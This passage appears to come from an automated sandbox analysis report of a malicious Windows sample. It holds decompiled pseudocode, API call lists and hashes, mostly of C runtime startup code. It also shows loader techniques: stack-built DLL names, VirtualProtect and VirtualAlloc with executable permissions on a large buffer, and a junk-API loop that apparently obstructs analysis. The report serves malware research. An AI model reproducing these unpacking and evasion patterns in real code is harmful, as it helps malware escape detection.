                            								_v124 = GetStdHandle(_v144);
                            								if(_v124 == 0xffffffff || _v124 == 0) {
                            									L52:
                            									_v128[1] = _v128[1] | 0x00000040;
                            									 *_v128 = 0xfffffffe;
                            									goto L53;
                            								} else {
                            									_v108 = GetFileType(_v124);
                            									if(_v108 == 0) {
                            										goto L52;
                            									} else {
                            										 *_v128 = _v124;
                            										if((_v108 & 0x000000ff) != 2) {
                            											if((_v108 & 0x000000ff) == 3) {
                            												_v128[1] = _v128[1] | 0x00000008;
                            											}
                            										} else {
                            											_v128[1] = _v128[1] | 0x00000040;
                            										}
                            										_t188 = E00417180( &(_v128[3]), 0xfa0);
                            										_t324 = _t324 + 8;
                            										if(_t188 != 0) {
                            											_v128[2] = _v128[2] + 1;
                            											L53:
                            											goto L55;
                            										} else {
                            											_t175 = _t188 | 0xffffffff;
                            										}
                            									}
                            								}
                            							} else {
                            								_v128[1] = _v128[1] | 0x00000080;
                            								L55:
                            								_v112 = _v112 + 1;
                            								continue;
                            							}
                            							goto L57;
                            						}
                            						SetHandleCount( *0x633420);
                            						_t175 = 0;
                            					} else {
                            						_v116 =  *(_v100.lpReserved2);
                            						_v120 = _v100.lpReserved2 + 4;
                            						_v132 =  &(_v120[_v116]);
                            						if(_v116 >= 0x800) {
                            							_v140 = 0x800;
                            						} else {
                            							_v140 = _v116;
                            						}
                            						_v116 = _v140;
                            						_v104 = 1;
                            						while( *0x633420 < _v116) {
                            							_t209 = L0040BB40(0x20, 0x40, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\ioinit.c", 0xc0);
                            							_t324 = _t324 + 0x14;
                            							_v128 = _t209;
                            							if(_v128 != 0) {
                            								 *((intOrPtr*)(0x633440 + _v104 * 4)) = _v128;
                            								 *0x633420 =  *0x633420 + 0x20;
                            								while(_v128 <  *((intOrPtr*)(0x633440 + _v104 * 4)) + 0x800) {
                            									_v128[1] = 0;
                            									 *_v128 = 0xffffffff;
                            									_v128[1] = 0xa;
                            									_v128[2] = 0;
                            									_v128[9] = _v128[9] & 0x00000080;
                            									_v128[9] = 0xa;
                            									_v128[9] = 0xa;
                            									_v128[0xe] = 0;
                            									_v128[0xd] = 0;
                            									_v128 =  &(_v128[0x10]);
                            								}
                            								_v104 = _v104 + 1;
                            								continue;
                            							} else {
                            								_v116 =  *0x633420;
                            							}
                            							break;
                            						}
                            						_v112 = 0;
                            						while(_v112 < _v116) {
                            							if( *_v132 == 0xffffffff ||  *_v132 == 0xfffffffe || ( *_v120 & 0x00000001) == 0 || ( *_v120 & 0x00000008) == 0 && GetFileType( *_v132) == 0) {
                            								L33:
                            								_v112 = _v112 + 1;
                            								_v120 =  &(_v120[1]);
                            								_v132 =  &(_v132[1]);
                            								continue;
                            							} else {
                            								_v128 = ((_v112 & 0x0000001f) << 6) +  *((intOrPtr*)(0x633440 + (_v112 >> 5) * 4));
                            								 *_v128 =  *_v132;
                            								_v128[1] =  *_v120;
                            								_t206 = E00417180( &(_v128[3]), 0xfa0);
                            								_t324 = _t324 + 8;
                            								if(_t206 != 0) {
                            									_v128[2] =  *((intOrPtr*)(_v128 + 8)) + 1;
                            									goto L33;
                            								} else {
                            									_t175 = _t206 | 0xffffffff;
                            								}
                            							}
                            							goto L57;
                            						}
                            						goto L34;
                            					}
                            				} else {
                            					_t175 = _t170 | 0xffffffff;
                            				}
                            				L57:
                            				 *[fs:0x0] = _v20;
                            				return _t175;
                            			}




























                            0x00411525
                            0x00411527
                            0x0041152c
                            0x00411537
                            0x00411538
                            0x0041153e
                            0x00411543
                            0x00411548
                            0x0041154c
                            0x00411552
                            0x00411555
                            0x00411560
                            0x00411566
                            0x004115ab
                            0x004115b0
                            0x004115b3
                            0x004115ba
                            0x004115c7
                            0x004115cd
                            0x004115e2
                            0x004115f4
                            0x004115fb
                            0x00411604
                            0x0041160b
                            0x0041161d
                            0x0041162b
                            0x00411631
                            0x00411638
                            0x0041163f
                            0x00411649
                            0x004115df
                            0x004115df
                            0x00411655
                            0x00411853
                            0x00411853
                            0x00411865
                            0x0041187b
                            0x00411884
                            0x00411895
                            0x0041189d
                            0x004118b3
                            0x004118b8
                            0x0041189f
                            0x0041189f
                            0x0041189f
                            0x004118cb
                            0x004118d2
                            0x00411969
                            0x00411976
                            0x0041197c
                            0x00000000
                            0x004118e2
                            0x004118ec
                            0x004118f3
                            0x00000000
                            0x004118f5
                            0x004118fb
                            0x00411909
                            0x00411929
                            0x00411938
                            0x00411938
                            0x0041190b
                            0x00411918
                            0x00411918
                            0x00411947
                            0x0041194c
                            0x00411951
                            0x00411964
                            0x00411982
                            0x00000000
                            0x00411953
                            0x00411953
                            0x00411953
                            0x00411951
                            0x004118f3
                            0x00411984
                            0x00411993
                            0x00411996
                            0x00411862
                            0x00000000
                            0x00411862
                            0x00000000
                            0x00411884
                            0x004119a2
                            0x004119a8
                            0x00411665
                            0x0041166a
                            0x00411673
                            0x0041167c
                            0x00411686
                            0x00411693
                            0x00411688
                            0x0041168b
                            0x0041168b
                            0x004116a3
                            0x004116a6
                            0x004116b8
                            0x004116d7
                            0x004116dc
                            0x004116df
                            0x004116e6
                            0x004116fb
                            0x0041170a
                            0x0041171a
                            0x00411731
                            0x00411738
                            0x00411741
                            0x00411748
                            0x0041175a
                            0x00411760
                            0x00411767
                            0x0041176e
                            0x00411778
                            0x00411717
                            0x00411717
                            0x004116b5
                            0x00000000
                            0x004116e8
                            0x004116ed
                            0x004116ed
                            0x00000000
                            0x004116e6
                            0x00411783
                            0x004117a7
                            0x004117b9
                            0x0041184e
                            0x00411792
                            0x0041179b
                            0x004117a4
                            0x00000000
                            0x004117f1
                            0x00411807
                            0x00411812
                            0x0041181c
                            0x0041182b
                            0x00411830
                            0x00411835
                            0x0041184b
                            0x00000000
                            0x00411837
                            0x00411837
                            0x00411837
                            0x00411835
                            0x00000000
                            0x004117b9
                            0x00000000
                            0x004117a7
                            0x004115bc
                            0x004115bc
                            0x004115bc
                            0x004119aa
                            0x004119ad
                            0x004119bb

                            APIs
                            • GetStartupInfoA.KERNEL32(?), ref: 00411560
                            • GetFileType.KERNEL32(?), ref: 004117E7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: FileInfoStartupType
                            • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
                            • API String ID: 3016745765-4097262939
                            • Opcode ID: 47a6d8ad94d666b3f8f354c98aa2db64856be1adfe7ae4363de3c8dcf5f3bbe3
                            • Instruction ID: 827ff17d8c5c83ead693b010b1c146f3c9559527b4d49fc1b9c9966abe1dfc56
                            • Opcode Fuzzy Hash: 47a6d8ad94d666b3f8f354c98aa2db64856be1adfe7ae4363de3c8dcf5f3bbe3
                            • Instruction Fuzzy Hash: 93E1E874E04248CFDB24CFA8C894BADFBB1BB49314F24825ED565AB392C7399842CF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 315 40ba7e-40ba93 316 40ba95-40bab3 call 40e1a0 315->316 317 40bab6-40baba 315->317 316->317 326 40bab5 316->326 318 40bae9-40bb0e call 40b650 317->318 319 40babc-40bae7 call 40ec70 call 411a50 317->319 325 40bb13-40bb1d 318->325 332 40bb34-40bb37 319->332 328 40bb31 325->328 329 40bb1f-40bb2e call 412d20 325->329 326->317 328->332 329->328
                            C-Code - Quality: 42%
                            			E0040BA7E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                            				intOrPtr _t25;
                            				intOrPtr _t28;
                            				intOrPtr _t29;
                            				void* _t34;
                            				void* _t35;
                            				void* _t36;
                            				intOrPtr _t38;
                            				void* _t46;
                            				void* _t47;
                            				void* _t48;
                            				void* _t50;
                            
                            				_t47 = __esi;
                            				_t46 = __edi;
                            				_t36 = __ecx;
                            				_t35 = __ebx;
                            				asm("sbb eax, eax");
                            				_t25 = 0xffffffe0 /  *(_t48 + 8) + 1;
                            				 *((intOrPtr*)(_t48 - 8)) = _t25;
                            				if(_t25 == 0) {
                            					_push(L"(_HEAP_MAXREQ / nNum) >= nSize");
                            					_push(0);
                            					_push(0x248);
                            					_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c");
                            					_push(2);
                            					_t34 = L0040E1A0();
                            					_t50 = _t50 + 0x14;
                            					if(_t34 == 1) {
                            						asm("int3");
                            					}
                            				}
                            				if( *((intOrPtr*)(_t48 - 8)) != 0) {
                            					 *(_t48 + 0xc) =  *(_t48 + 0xc) *  *(_t48 + 8);
                            					_t38 =  *0x632a90; // 0x0
                            					_t28 = L0040B650(_t38,  *(_t48 + 0xc), _t38,  *((intOrPtr*)(_t48 + 0x10)),  *((intOrPtr*)(_t48 + 0x14)),  *((intOrPtr*)(_t48 + 0x18)),  *((intOrPtr*)(_t48 + 0x1c))); // executed
                            					 *((intOrPtr*)(_t48 - 4)) = _t28;
                            					if( *((intOrPtr*)(_t48 - 4)) != 0) {
                            						E00412D20(_t46,  *((intOrPtr*)(_t48 - 4)), 0,  *(_t48 + 0xc));
                            					}
                            					_t29 =  *((intOrPtr*)(_t48 - 4));
                            				} else {
                            					 *((intOrPtr*)(L0040EC70(_t36))) = 0xc;
                            					E00411A50(_t35, _t36, _t46, _t47, L"(_HEAP_MAXREQ / nNum) >= nSize", L"_calloc_dbg_impl", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c", 0x248, 0);
                            					_t29 = 0;
                            				}
                            				return _t29;
                            			}














                            0x0040ba7e
                            0x0040ba7e
                            0x0040ba7e
                            0x0040ba7e
                            0x0040ba8b
                            0x0040ba8d
                            0x0040ba90
                            0x0040ba93
                            0x0040ba95
                            0x0040ba9a
                            0x0040ba9c
                            0x0040baa1
                            0x0040baa6
                            0x0040baa8
                            0x0040baad
                            0x0040bab3
                            0x0040bab5
                            0x0040bab5
                            0x0040bab3
                            0x0040baba
                            0x0040baf0
                            0x0040bb03
                            0x0040bb0e
                            0x0040bb16
                            0x0040bb1d
                            0x0040bb29
                            0x0040bb2e
                            0x0040bb31
                            0x0040babc
                            0x0040bac1
                            0x0040badd
                            0x0040bae5
                            0x0040bae5
                            0x0040bb37

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invalid_parameter_memset
                            • String ID: (_HEAP_MAXREQ / nNum) >= nSize$_calloc_dbg_impl$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                            • API String ID: 3961059608-1805389939
                            • Opcode ID: b796c7521e64e4592a57c05bec9a04ed8bb3360dde59313c2adb3e29e59732cd
                            • Instruction ID: 6ff698db135874b2db21e70b776e5c91729a7b30f69118cb3a561ec915fc92dc
                            • Opcode Fuzzy Hash: b796c7521e64e4592a57c05bec9a04ed8bb3360dde59313c2adb3e29e59732cd
                            • Instruction Fuzzy Hash: 1A11B971A40208BBDB00DF55CD42F5E73A5EB54704F10856AF918BB2D1D778D9508B98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 334 409c70-409d24 LoadLibraryA VirtualProtect
                            C-Code - Quality: 100%
                            			E00409C70() {
                            				struct HINSTANCE__* _t2;
                            				int _t4;
                            				long _t6;
                            				DWORD* _t8;
                            
                            				"simg32.dll" = 0x65;
                            				"img32.dll" = 0x72;
                            				 *0x60b690 = 0x2e;
                            				 *0x60b691 = 0x64;
                            				 *0x60b692 = 0x6c;
                            				 *0x60b694 = 0;
                            				M0060B68C = 0x65;
                            				"32.dll" = 0x6c;
                            				 *0x60b68e = 0x33;
                            				 *0x60b68f = 0x32;
                            				 *0x60b693 = 0x65;
                            				M0060B68B = 0x6e;
                            				"msimg32.dll" = 0x6b; // executed
                            				_t2 = LoadLibraryA("msimg32.dll");
                            				_t6 =  *0x6328e4; // 0x1e30c0
                            				 *0x631f7c = _t2;
                            				 *0x60b696 = 0;
                            				 *0x60b68f = 0x50;
                            				"32.dll" = 0x61;
                            				"msimg32.dll" = 0x60;
                            				 *0x60b690 = 0x7c;
                            				 *0x60b691 = 0x6f;
                            				 *0x60b695 = 0x74; // executed
                            				_t4 = VirtualProtect( *0x615d40, _t6, 0x40, _t8); // executed
                            				return _t4;
                            			}







                            0x00409c7a
                            0x00409c7f
                            0x00409c86
                            0x00409c8d
                            0x00409c94
                            0x00409c9a
                            0x00409ca1
                            0x00409ca6
                            0x00409cac
                            0x00409cb3
                            0x00409cba
                            0x00409cbf
                            0x00409cc6
                            0x00409ccd
                            0x00409cd3
                            0x00409cdf
                            0x00409cec
                            0x00409cf3
                            0x00409cfa
                            0x00409d01
                            0x00409d08
                            0x00409d0f
                            0x00409d16
                            0x00409d1d
                            0x00409d24

                            APIs
                            • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00409CCD
                            • VirtualProtect.KERNELBASE(?,001E30C0,00000040,00000000), ref: 00409D1D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: LibraryLoadProtectVirtual
                            • String ID: msimg32.dll
                            • API String ID: 3279857687-3287713914
                            • Opcode ID: 212c11f1efb708d304d7f10a71409bc8fe722fd08b7616f05590d402311453a9
                            • Instruction ID: a91203cf1349bc1cbde20b50c3f5c1ad4d6b8465f910441af6d6693b1f3a1392
                            • Opcode Fuzzy Hash: 212c11f1efb708d304d7f10a71409bc8fe722fd08b7616f05590d402311453a9
                            • Instruction Fuzzy Hash: 2A1193600A92C0CDE302CB28BD597533F9B9327708F09F28DE1895B2A2C7EB1118D776
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 335 40b66f-40b679 336 40b680-40b684 335->336 337 40b67b-40b67e 335->337 338 40b694-40b6a2 call 412ce0 336->338 339 40b686-40b692 336->339 340 40b6b3-40b6b6 337->340 343 40b6b1 338->343 344 40b6a4-40b6af 338->344 339->340 345 40b656-40b66a call 40b6c0 343->345 344->340 345->335
                            C-Code - Quality: 100%
                            			E0040B66F(intOrPtr __eax, void* __ecx) {
                            				intOrPtr _t20;
                            				void* _t27;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					 *((intOrPtr*)(_t27 - 4)) = __eax;
                            					if( *((intOrPtr*)(_t27 - 4)) != 0) {
                            						break;
                            					}
                            					L3:
                            					if( *((intOrPtr*)(_t27 + 0xc)) != 0) {
                            						L5:
                            						if(E00412CE0(__ecx,  *((intOrPtr*)(_t27 + 8))) != 0) {
                            							L7:
                            							L1:
                            							L0040B6C0( *((intOrPtr*)(_t27 + 8)),  *((intOrPtr*)(_t27 + 0x10)),  *((intOrPtr*)(_t27 + 0x14)),  *((intOrPtr*)(_t27 + 0x18)),  *((intOrPtr*)(_t27 + 0x1c)));
                            							continue;
                            						} else {
                            							L6:
                            							 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x1c)))) = 0xc;
                            							_t20 = 0;
                            						}
                            					} else {
                            						L4:
                            						 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x1c)))) = 0xc;
                            						_t20 =  *((intOrPtr*)(_t27 - 4));
                            					}
                            					L8:
                            					return _t20;
                            					L9:
                            				}
                            				L2:
                            				_t20 =  *((intOrPtr*)(_t27 - 4));
                            				goto L8;
                            			}





                            0x0040b66f
                            0x0040b66f
                            0x0040b66f
                            0x0040b672
                            0x0040b679
                            0x00000000
                            0x00000000
                            0x0040b680
                            0x0040b684
                            0x0040b694
                            0x0040b6a2
                            0x0040b6b1
                            0x0040b656
                            0x0040b66a
                            0x00000000
                            0x0040b6a4
                            0x0040b6a4
                            0x0040b6a7
                            0x0040b6ad
                            0x0040b6ad
                            0x0040b686
                            0x0040b686
                            0x0040b689
                            0x0040b68f
                            0x0040b68f
                            0x0040b6b3
                            0x0040b6b6
                            0x00000000
                            0x0040b6b6
                            0x0040b67b
                            0x0040b67b
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID:
                            • String ID: QQ
                            • API String ID: 0-3460843698
                            • Opcode ID: b3bc6af8014fb0556a34892475fd8addd3e98cc67a8eb0fbb24b46698522ec7e
                            • Instruction ID: 294cf07c255e33463b5eabae3086a57cf661838ca6fbaf8a486146d9469ac8e9
                            • Opcode Fuzzy Hash: b3bc6af8014fb0556a34892475fd8addd3e98cc67a8eb0fbb24b46698522ec7e
                            • Instruction Fuzzy Hash: 8F01FBB5600109EBDB14DF54C944BAA73B4EB48304F10896AF905A7380D73ADA51DBDE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 347 22fb7c6-22fb7df 348 22fb7e1-22fb7e3 347->348 349 22fb7ea-22fb7f6 348->349 350 22fb7e5 348->350 352 22fb7f8-22fb7fe 349->352 353 22fb806-22fb813 Module32First 349->353 350->349 352->353 359 22fb800-22fb804 352->359 354 22fb81c-22fb824 353->354 355 22fb815-22fb816 call 22fb485 353->355 360 22fb81b 355->360 359->348 359->353 360->354
                            APIs
                            • Module32First.KERNEL32(00000000,00000224), ref: 022FB80E
                            Memory Dump Source
                            • Source File: 00000000.00000002.256540868.00000000022FB000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FB000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_22fb000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: FirstModule32
                            • String ID:
                            • API String ID: 3757679902-0
                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction ID: 084bb4abe49fb5d13bd5993c218c63d456815074218be2ac825834ff67cde654
                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                            • Instruction Fuzzy Hash: B5F0C2362103116BD7603BF4EC8CBAAB6E8AF8C669F100238E742954C0CB70E8454A60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 361 4101e0-4101e7 call 410110 363 4101ec-4101f0 361->363
                            C-Code - Quality: 100%
                            			E004101E0() {
                            				void* _t1;
                            
                            				_t1 = E00410110(0); // executed
                            				return _t1;
                            			}




                            0x004101e7
                            0x004101f0

                            APIs
                            • __encode_pointer.LIBCMTD ref: 004101E7
                              • Part of subcall function 00410110: TlsGetValue.KERNEL32(00000005), ref: 00410125
                              • Part of subcall function 00410110: TlsGetValue.KERNEL32(00000005,00000004), ref: 00410146
                              • Part of subcall function 00410110: __crt_wait_module_handle.LIBCMTD ref: 0041015C
                              • Part of subcall function 00410110: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00410176
                              • Part of subcall function 00410110: RtlEncodePointer.NTDLL(?), ref: 00410197
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Value$AddressEncodePointerProc__crt_wait_module_handle__encode_pointer
                            • String ID:
                            • API String ID: 568403282-0
                            • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                            • Instruction ID: 8c9a2190b9c7e492981362f40d45408256e576df1b8fa31835db1f7dcd19085b
                            • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                            • Instruction Fuzzy Hash: 57A0127294420C33D08120933803B02350C43C0738F080021F50C0514328D7A4904097
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 364 40b310-40b315 call 411ca0 366 40b31a call 40b330 364->366
                            C-Code - Quality: 100%
                            			_entry_() {
                            				void* _t2;
                            				void* _t3;
                            				void* _t4;
                            
                            				E00411CA0(); // executed
                            				_t2 = L0040B330(_t3, _t4); // executed
                            				return _t2;
                            			}






                            0x0040b315
                            0x0040b31a
                            0x00000000

                            APIs
                            • ___security_init_cookie.LIBCMTD ref: 0040B315
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: ___security_init_cookie
                            • String ID:
                            • API String ID: 3657697845-0
                            • Opcode ID: 3af4f6196a54f9386e15a2a7791e4ccbc1d0389973c9f4251828c21cd8ff7d9f
                            • Instruction ID: 8118cc6a2f55ae8788abd7dacfa75f102871a0f58a3bde6f166546d615b0b6cc
                            • Opcode Fuzzy Hash: 3af4f6196a54f9386e15a2a7791e4ccbc1d0389973c9f4251828c21cd8ff7d9f
                            • Instruction Fuzzy Hash: CFA0022145474C16415533A71447A4B754D88C0B987F5002B7A1C521533D7CB85140EE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 368 22fb485-22fb4bf call 22fb798 371 22fb50d 368->371 372 22fb4c1-22fb4f4 VirtualAlloc call 22fb512 368->372 371->371 374 22fb4f9-22fb50b 372->374 374->371
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 022FB4D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.256540868.00000000022FB000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FB000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_22fb000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction ID: f73fa01e9922634c9050632ad30768e1636630f453898706a5c52c9ad791c906
                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction Fuzzy Hash: 0F113C79A00208EFDB01DF98C985E99BBF5AF08750F0580A4FA489B361D375EA90DF80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 440 409d30-409d43 LocalAlloc
                            C-Code - Quality: 100%
                            			E00409D30() {
                            				long _t1;
                            				void* _t2;
                            
                            				_t1 =  *0x6328e4; // 0x1e30c0
                            				_t2 = LocalAlloc(0, _t1); // executed
                            				 *0x615d40 = _t2;
                            				return _t2;
                            			}





                            0x00409d30
                            0x00409d38
                            0x00409d3e
                            0x00409d43

                            APIs
                            • LocalAlloc.KERNELBASE(00000000,001E30C0), ref: 00409D38
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: AllocLocal
                            • String ID:
                            • API String ID: 3494564517-0
                            • Opcode ID: 9d19b7ef041325152a98067dedbf4776263471a34a491149feb11ec5df455169
                            • Instruction ID: 6fc1ec559f54ca827ffd6ccf27bd46d00434fd5742df4e3d8ce03a8d0c80a74a
                            • Opcode Fuzzy Hash: 9d19b7ef041325152a98067dedbf4776263471a34a491149feb11ec5df455169
                            • Instruction Fuzzy Hash: 90B012B0500200DFD3008F60FD18B6037A5F744302F046013F60DC9A70C73004449B14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E00409D50() {
                            				short _v2048;
                            				char _v2080;
                            				char _v3080;
                            				struct _OSVERSIONINFOW _v3368;
                            				struct _STARTUPINFOA _v3436;
                            				void _v3448;
                            				long _v3452;
                            				long _v3456;
                            				long _v3460;
                            				long _v3464;
                            				long _v3468;
                            				long _v3476;
                            				long _v3484;
                            				long _t27;
                            				intOrPtr _t28;
                            				void* _t29;
                            				long _t48;
                            				intOrPtr* _t61;
                            				void* _t82;
                            				intOrPtr* _t86;
                            
                            				_t61 = __imp__GetSystemWow64DirectoryW;
                            				_t86 = __imp__GetCPInfoExW;
                            				_v3468 = 0;
                            				while(1) {
                            					GetLastError();
                            					if( *0x6328e4 == 0x16) {
                            						SetConsoleTextAttribute(0, 0);
                            						DebugBreak();
                            						__imp__SetCalendarInfoA(0, 0, 0, 0);
                            						WriteProfileSectionW(L"Wupezoxaxozumiw gifubedi", L"Huzulibopabuda nuzahokecuxel muhu");
                            					}
                            					GetLastError();
                            					if( *0x6328e4 == 0x9e) {
                            						CopyFileA(0, 0, 0);
                            						 *_t61( &_v2048, 0);
                            						 *_t86(0, 0,  &_v3080);
                            						_v3484 = 0;
                            						DisconnectNamedPipe( &_v3484);
                            						GetStartupInfoA( &_v3436);
                            						InterlockedCompareExchange( &_v3476, 0, 0);
                            						HeapValidate(0, 0, 0);
                            						GetVersionExW( &_v3368);
                            					}
                            					_t27 = _v3468;
                            					if(_t27 > 0x3775ee) {
                            						break;
                            					}
                            					_t48 = _t27 + 1;
                            					_v3468 = _t48;
                            					if(_t48 < 0x332beaf6) {
                            						continue;
                            					}
                            					break;
